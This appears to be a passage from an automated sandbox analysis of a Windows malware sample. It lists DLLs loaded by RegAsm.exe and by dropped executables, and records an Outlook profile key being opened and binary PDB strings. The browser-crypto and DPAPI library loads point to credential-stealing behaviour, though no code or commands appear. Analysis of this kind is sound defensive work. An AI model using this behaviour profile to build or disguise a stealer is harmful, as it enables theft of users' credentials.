Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: mscoree.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: apphelp.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: version.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: mscoree.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: apphelp.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: version.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source: Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source: Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source: Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
